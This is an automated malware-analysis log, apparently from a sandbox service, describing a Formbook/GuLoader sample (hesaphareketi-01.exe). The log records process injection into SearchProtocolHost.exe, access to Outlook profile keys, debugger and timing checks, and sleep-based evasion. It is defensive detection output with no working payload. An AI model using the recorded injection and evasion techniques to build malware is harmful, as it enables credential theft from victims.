        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0386ACEB19_2_0386ACEB
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BFCE019_2_037BFCE0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B8CDF19_2_037B8CDF
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0384EC4C19_2_0384EC4C
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0385EC6019_2_0385EC60
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03856C6919_2_03856C69
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_02DA17B019_2_02DA17B0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_02DB72E019_2_02DB72E0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_02DB72E619_2_02DB72E6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 0378B910 appears 264 times
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 037E7BE4 appears 85 times
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 0381EF10 appears 98 times
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 0380E692 appears 71 times
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 037D5050 appears 35 times
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: edgegdi.dllJump to behavior
        Source: hesaphareketi-01.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000013.00000002.5795631450.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000013.00000002.5795764214.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000C.00000002.5796633331.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/11@19/17
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00404873 GetDiskFreeSpaceW,MulDiv,0_2_00404873
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_004020FE CoCreateInstance,0_2_004020FE
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile created: C:\Users\Public\Pictures\KenotismJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile created: C:\Users\user\AppData\Local\Temp\nsd30CB.tmpJump to behavior
        Source: hesaphareketi-01.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: hesaphareketi-01.exeVirustotal: Detection: 18%
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile read: C:\Users\user\Desktop\hesaphareketi-01.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\hesaphareketi-01.exe C:\Users\user\Desktop\hesaphareketi-01.exe
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Users\user\Desktop\hesaphareketi-01.exe C:\Users\user\Desktop\hesaphareketi-01.exe
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe C:\Windows\SysWOW64\SearchProtocolHost.exe
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Users\user\Desktop\hesaphareketi-01.exe C:\Users\user\Desktop\hesaphareketi-01.exeJump to behavior
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe C:\Windows\SysWOW64\SearchProtocolHost.exeJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: hesaphareketi-01.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: wntdll.pdb source: SearchProtocolHost.exe
        Source: Binary string: SearchProtocolHost.pdbUGP source: iyGEtqCQDnvMouCuszv.exe, 0000000C.00000003.1297585062.0000000000F0D000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: SearchProtocolHost.pdb source: iyGEtqCQDnvMouCuszv.exe, 0000000C.00000003.1297585062.0000000000F0D000.00000004.00000001.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000000.00000002.1275057239.0000000008E1E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.1273244307.000000000078C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.exe PID: 9444, type: MEMORYSTR
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FDA8B9 push edi; ret 12_2_00FDA8BA
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FE794F push ebp; iretd 12_2_00FE7967
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FE7946 push ebp; iretd 12_2_00FE7967
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FC7142 pushad ; retf 12_2_00FC7156
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FD8377 push cs; retf 12_2_00FD8392
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FC734C push 0000005Fh; iretd 12_2_00FC7366
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FEDC5E push eax; ret 12_2_00FEDC60
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FDD506 push ds; ret 12_2_00FDD51A
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exeCode function: 12_2_00FD46D1 push 0000001Bh; ret 12_2_00FD46DF
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037908CD push ecx; mov dword ptr [esp], ecx19_2_037908D6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_02DB837F push eax; ret 19_2_02DB8381
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile created: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\LangDLL.dllJump to dropped file
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile created: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D1763 rdtsc 19_2_037D1763
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeWindow / User API: threadDelayed 9852Jump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI coverage: 3.2 %
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe TID: 9184Thread sleep time: -145000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe TID: 9184Thread sleep count: 67 > 30Jump to behavior
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe TID: 9184Thread sleep time: -100500s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe TID: 9184Thread sleep count: 75 > 30Jump to behavior
        Source: C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe TID: 9184Thread sleep time: -75000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 8228Thread sleep count: 120 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 8228Thread sleep time: -240000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 8228Thread sleep count: 9852 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 8228Thread sleep time: -19704000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_004065C5 FindFirstFileW,FindClose,0_2_004065C5
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405990
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_02DAC020 FindFirstFileW,FindNextFileW,FindClose,19_2_02DAC020
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeAPI call chain: ExitProcess graph end nodegraph_0-4520
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeAPI call chain: ExitProcess graph end nodegraph_0-4527
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D1763 rdtsc 19_2_037D1763
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037D4260 NtSetContextThread,LdrInitializeThunk,19_2_037D4260
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B237A mov eax, dword ptr fs:[00000030h]19_2_037B237A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0384F38A mov eax, dword ptr fs:[00000030h]19_2_0384F38A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379B360 mov eax, dword ptr fs:[00000030h]19_2_0379B360
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379B360 mov eax, dword ptr fs:[00000030h]19_2_0379B360
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379B360 mov eax, dword ptr fs:[00000030h]19_2_0379B360
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379B360 mov eax, dword ptr fs:[00000030h]19_2_0379B360
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379B360 mov eax, dword ptr fs:[00000030h]19_2_0379B360
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0379B360 mov eax, dword ptr fs:[00000030h]19_2_0379B360
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CE363 mov eax, dword ptr fs:[00000030h]19_2_037CE363
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CE363 mov eax, dword ptr fs:[00000030h]19_2_037CE363
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CE363 mov eax, dword ptr fs:[00000030h]19_2_037CE363
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CE363 mov eax, dword ptr fs:[00000030h]19_2_037CE363
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CE363 mov eax, dword ptr fs:[00000030h]19_2_037CE363
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CE363 mov eax, dword ptr fs:[00000030h]19_2_037CE363
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CE363 mov eax, dword ptr fs:[00000030h]19_2_037CE363
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CE363 mov eax, dword ptr fs:[00000030h]19_2_037CE363
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CA350 mov eax, dword ptr fs:[00000030h]19_2_037CA350
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380C3B0 mov eax, dword ptr fs:[00000030h]19_2_0380C3B0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378E328 mov eax, dword ptr fs:[00000030h]19_2_0378E328
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378E328 mov eax, dword ptr fs:[00000030h]19_2_0378E328
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378E328 mov eax, dword ptr fs:[00000030h]19_2_0378E328
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038143D5 mov eax, dword ptr fs:[00000030h]19_2_038143D5
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B332D mov eax, dword ptr fs:[00000030h]19_2_037B332D
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C8322 mov eax, dword ptr fs:[00000030h]19_2_037C8322
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C8322 mov eax, dword ptr fs:[00000030h]19_2_037C8322
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C8322 mov eax, dword ptr fs:[00000030h]19_2_037C8322
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C631F mov eax, dword ptr fs:[00000030h]19_2_037C631F
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037AE310 mov eax, dword ptr fs:[00000030h]19_2_037AE310
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037AE310 mov eax, dword ptr fs:[00000030h]19_2_037AE310
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037AE310 mov eax, dword ptr fs:[00000030h]19_2_037AE310
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03789303 mov eax, dword ptr fs:[00000030h]19_2_03789303
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03789303 mov eax, dword ptr fs:[00000030h]19_2_03789303
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0381330C mov eax, dword ptr fs:[00000030h]19_2_0381330C
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0381330C mov eax, dword ptr fs:[00000030h]19_2_0381330C
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0381330C mov eax, dword ptr fs:[00000030h]19_2_0381330C
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0381330C mov eax, dword ptr fs:[00000030h]19_2_0381330C
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0384F30A mov eax, dword ptr fs:[00000030h]19_2_0384F30A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C33D0 mov eax, dword ptr fs:[00000030h]19_2_037C33D0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037C43D0 mov ecx, dword ptr fs:[00000030h]19_2_037C43D0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03863336 mov eax, dword ptr fs:[00000030h]19_2_03863336
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037963CB mov eax, dword ptr fs:[00000030h]19_2_037963CB
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378E3C0 mov eax, dword ptr fs:[00000030h]19_2_0378E3C0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378E3C0 mov eax, dword ptr fs:[00000030h]19_2_0378E3C0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378E3C0 mov eax, dword ptr fs:[00000030h]19_2_0378E3C0
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378C3C7 mov eax, dword ptr fs:[00000030h]19_2_0378C3C7
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037993A6 mov eax, dword ptr fs:[00000030h]19_2_037993A6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037993A6 mov eax, dword ptr fs:[00000030h]19_2_037993A6
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BA390 mov eax, dword ptr fs:[00000030h]19_2_037BA390
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BA390 mov eax, dword ptr fs:[00000030h]19_2_037BA390
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BA390 mov eax, dword ptr fs:[00000030h]19_2_037BA390
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03810371 mov eax, dword ptr fs:[00000030h]19_2_03810371
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03810371 mov eax, dword ptr fs:[00000030h]19_2_03810371
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E372 mov eax, dword ptr fs:[00000030h]19_2_0380E372
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E372 mov eax, dword ptr fs:[00000030h]19_2_0380E372
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E372 mov eax, dword ptr fs:[00000030h]19_2_0380E372
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E372 mov eax, dword ptr fs:[00000030h]19_2_0380E372
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03791380 mov eax, dword ptr fs:[00000030h]19_2_03791380
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03791380 mov eax, dword ptr fs:[00000030h]19_2_03791380
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03791380 mov eax, dword ptr fs:[00000030h]19_2_03791380
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03791380 mov eax, dword ptr fs:[00000030h]19_2_03791380
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_03791380 mov eax, dword ptr fs:[00000030h]19_2_03791380
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037AF380 mov eax, dword ptr fs:[00000030h]19_2_037AF380
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037AF380 mov eax, dword ptr fs:[00000030h]19_2_037AF380
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037AF380 mov eax, dword ptr fs:[00000030h]19_2_037AF380
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037AF380 mov eax, dword ptr fs:[00000030h]19_2_037AF380
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037AF380 mov eax, dword ptr fs:[00000030h]19_2_037AF380
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037AF380 mov eax, dword ptr fs:[00000030h]19_2_037AF380
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0380E289 mov eax, dword ptr fs:[00000030h]19_2_0380E289
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378B273 mov eax, dword ptr fs:[00000030h]19_2_0378B273
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378B273 mov eax, dword ptr fs:[00000030h]19_2_0378B273
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0378B273 mov eax, dword ptr fs:[00000030h]19_2_0378B273
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0384F2AE mov eax, dword ptr fs:[00000030h]19_2_0384F2AE
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038592AB mov eax, dword ptr fs:[00000030h]19_2_038592AB
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037BF24A mov eax, dword ptr fs:[00000030h]19_2_037BF24A
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0386B2BC mov eax, dword ptr fs:[00000030h]19_2_0386B2BC
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0386B2BC mov eax, dword ptr fs:[00000030h]19_2_0386B2BC
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0386B2BC mov eax, dword ptr fs:[00000030h]19_2_0386B2BC
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_0386B2BC mov eax, dword ptr fs:[00000030h]19_2_0386B2BC
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037B0230 mov ecx, dword ptr fs:[00000030h]19_2_037B0230
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_038632C9 mov eax, dword ptr fs:[00000030h]19_2_038632C9
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CA22B mov eax, dword ptr fs:[00000030h]19_2_037CA22B
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 19_2_037CA22B mov eax, dword ptr fs:[00000030h]19_2_037CA22B
